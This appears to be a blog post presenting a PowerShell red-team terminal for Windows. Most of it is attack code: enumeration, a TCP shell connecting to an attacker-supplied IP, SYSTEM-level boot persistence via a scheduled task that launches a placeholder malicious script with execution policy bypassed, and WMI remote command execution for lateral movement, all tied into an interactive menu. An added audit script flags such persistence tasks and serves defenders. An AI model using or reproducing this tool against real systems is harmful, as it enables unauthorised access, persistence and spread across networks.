Red Team Terminal: An Advanced System Enumeration and Privilege Escalation Tool Explained
Author: qife122
2025-08-23, Fujian
Length: 2351 characters
Reading time: about 8 minutes

redteam_terminal.ps1
Author: Gerard King
Description: An advanced terminal program for tier-one red team operators, used for system enumeration, privilege escalation and persistence control.
Use case: Penetration testers and red team operators running adversary emulation exercises in Windows environments.
Tags: PowerShell, red team, penetration testing, enumeration, privilege escalation, persistence
System information collection function
```powershell
function Get-SystemInfo {
    # Collect OS, CPU, service and local user account information
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $cpu = Get-CimInstance -ClassName Win32_Processor
    $services = Get-Service
    $users = Get-WmiObject -Class Win32_UserAccount
    Write-Host "`n[+] 系统信息:"
    Write-Host "操作系统: $($os.Caption) | 版本: $($os.Version)"
    Write-Host "CPU: $($cpu.Name)"
    Write-Host "`n[+] 系统用户:"
    $users | ForEach-Object { Write-Host "用户: $($_.Name) | 域: $($_.Domain)" }
    # Lists every service with its status, not only the running ones
    Write-Host "`n[+] 运行中的服务:"
    $services | Select-Object Name, Status | Format-Table
}
```
Network port scan function
```powershell
function Scan-Network {
    # Lists sockets in the LISTENING state on the local host via netstat;
    # despite the name, it does not probe remote hosts
    Write-Host "`n[+] 网络扫描(开放端口):"
    $netstat = netstat -an | Select-String "LISTENING"
    $netstat | ForEach-Object { Write-Host $_.Line }
}
```
Privilege escalation check function
```powershell
function Priv-EscalationCheck {
    # Dumps the ACL of a few well-known directories for manual review
    Write-Host "`n[+] 权限提升检查(不安全权限):"
    $vulnerableDirs = @(
        "C:\Program Files",
        "C:\Windows\System32",
        "C:\Users\Public"
    )
    foreach ($dir in $vulnerableDirs) {
        Write-Host "`n检查目录: $dir"
        Get-Acl $dir | Select-Object Path, Access
    }
}
```
Reverse shell backdoor function
```powershell
function Start-ReverseShell {
    param (
        [string]$ip,
        [int]$port
    )
    Write-Host "`n[+] 启动反向Shell连接到 ${ip}:${port}"
    # Opens a TCP connection to the listener and relays typed commands line by line
    $reverseShell = New-Object System.Net.Sockets.TcpClient($ip, $port)
    $stream = $reverseShell.GetStream()
    $writer = New-Object System.IO.StreamWriter($stream)
    $reader = New-Object System.IO.StreamReader($stream)
    while ($true) {
        $command = Read-Host "Shell命令"
        if ($command -eq "exit") {
            $writer.WriteLine("exit")
            $writer.Flush()
            break
        }
        $writer.WriteLine($command)
        $writer.Flush()
        # Only a single response line is read per command
        $response = $reader.ReadLine()
        Write-Host $response
    }
    $reader.Close()
    $writer.Close()
    $reverseShell.Close()
}
```
Persistence setup function
```powershell
function Set-Persistence {
    Write-Host "`n[+] 设置持久化(计划任务)"
    $taskName = "RedTeamPersistence"
    # $taskAction first holds the full command line and is then overwritten with the
    # action object; as written, the -Argument string still begins with "powershell.exe"
    $taskAction = "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Your\MaliciousScript.ps1"
    $taskTrigger = New-ScheduledTaskTrigger -AtStartup
    $taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $taskAction
    Register-ScheduledTask -Action $taskAction -Trigger $taskTrigger -TaskName $taskName -User "NT AUTHORITY\SYSTEM"
    Write-Host "[+] 通过计划任务安装持久化机制: $taskName"
}
```
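As an added defender-side check (not part of redteam_terminal.ps1 or of the original post), the audit below lists scheduled tasks that match the pattern Set-Persistence registers: a boot trigger, a SYSTEM principal and a powershell.exe action passing -ExecutionPolicy Bypass. It assumes an elevated PowerShell session on the Windows host being audited; the function name Find-SuspiciousStartupTasks is my own.

```powershell
# Added audit script (not from the page's tool): flag scheduled tasks that combine a
# boot trigger, a SYSTEM principal and a PowerShell action with the execution policy bypassed.
function Find-SuspiciousStartupTasks {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        # Boot triggers are exposed as MSFT_TaskBootTrigger CIM instances
        $bootTrigger = $task.Triggers | Where-Object {
            $_.CimClass.CimClassName -eq 'MSFT_TaskBootTrigger'
        }
        # Actions that launch powershell.exe with -ExecutionPolicy Bypass
        $psAction = $task.Actions | Where-Object {
            $_.Execute -match 'powershell(\.exe)?$' -and
            $_.Arguments -match '-ExecutionPolicy\s+Bypass'
        }
        # The principal may be recorded by name or as the well-known SID
        $asSystem = $task.Principal.UserId -in @('SYSTEM', 'NT AUTHORITY\SYSTEM', 'S-1-5-18')
        if ($bootTrigger -and $psAction -and $asSystem) {
            [pscustomobject]@{
                TaskName  = $task.TaskName
                TaskPath  = $task.TaskPath
                Principal = $task.Principal.UserId
                Command   = "$($psAction.Execute) $($psAction.Arguments)"
                Author    = $task.Author
            }
        }
    }
}

# Print every matching task; a task created by Set-Persistence would show up as RedTeamPersistence
Find-SuspiciousStartupTasks | Format-Table -AutoSize
```

The three conditions are deliberately strict so the output stays short; relax any one of them (for example, drop the SYSTEM check) to widen the sweep, and compare hits against change records before acting on them.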
Lateral movement function
```powershell
function Lateral-Movement {
    param (
        [string]$targetIp,
        [string]$command
    )
    Write-Host "`n[+] 向 ${targetIp} 发起横向移动"
    # Creates a process on the remote host through WMI (Win32_Process.Create)
    Invoke-WmiMethod -ComputerName $targetIp -Class Win32_Process -Name Create -ArgumentList $command
    Write-Host "[+] 在 ${targetIp} 上执行的命令: ${command}"
}
```
Main terminal interaction function
```powershell
function Start-RedTeamTerminal {
    Clear-Host
    Write-Host "[+] 欢迎使用红队终端。准备接收命令。"
    Write-Host "[+] 输入 'exit' 退出或 'help' 查看可用命令。"
    while ($true) {
        # Use a local variable rather than the automatic variable $input
        $userInput = Read-Host "输入命令"
        switch ($userInput.ToLower()) {
            'sysinfo' { Get-SystemInfo }
            'network' { Scan-Network }
            'priv' { Priv-EscalationCheck }
            'rev' {
                $ip = Read-Host "输入攻击者IP"
                $port = Read-Host "输入端口"
                Start-ReverseShell -ip $ip -port $port
            }
            'persistence' { Set-Persistence }
            'lateral' {
                $targetIp = Read-Host "输入目标IP"
                $command = Read-Host "输入要执行的命令"
                Lateral-Movement -targetIp $targetIp -command $command
            }
            'exit' {
                Write-Host "[+] 退出红队终端。"
                # return leaves the function; a break here would only exit the switch,
                # so the while loop would keep prompting
                return
            }
            'help' {
                Write-Host "`n[+] 可用命令:"
                Write-Host "'sysinfo' - 显示系统信息"
                Write-Host "'network' - 扫描开放端口"
                Write-Host "'priv' - 检查权限提升机会"
                Write-Host "'rev' - 启动反向Shell后门"
                Write-Host "'persistence' - 通过计划任务设置持久化"
                Write-Host "'lateral' - 通过横向移动远程执行命令"
                Write-Host "'exit' - 退出终端"
            }
            default { Write-Host "[+] 无效命令。输入 'help' 查看可用命令。" }
        }
    }
}

# Start the red team terminal
Start-RedTeamTerminal

# Pause before closing
Read-Host "按Enter退出..."
```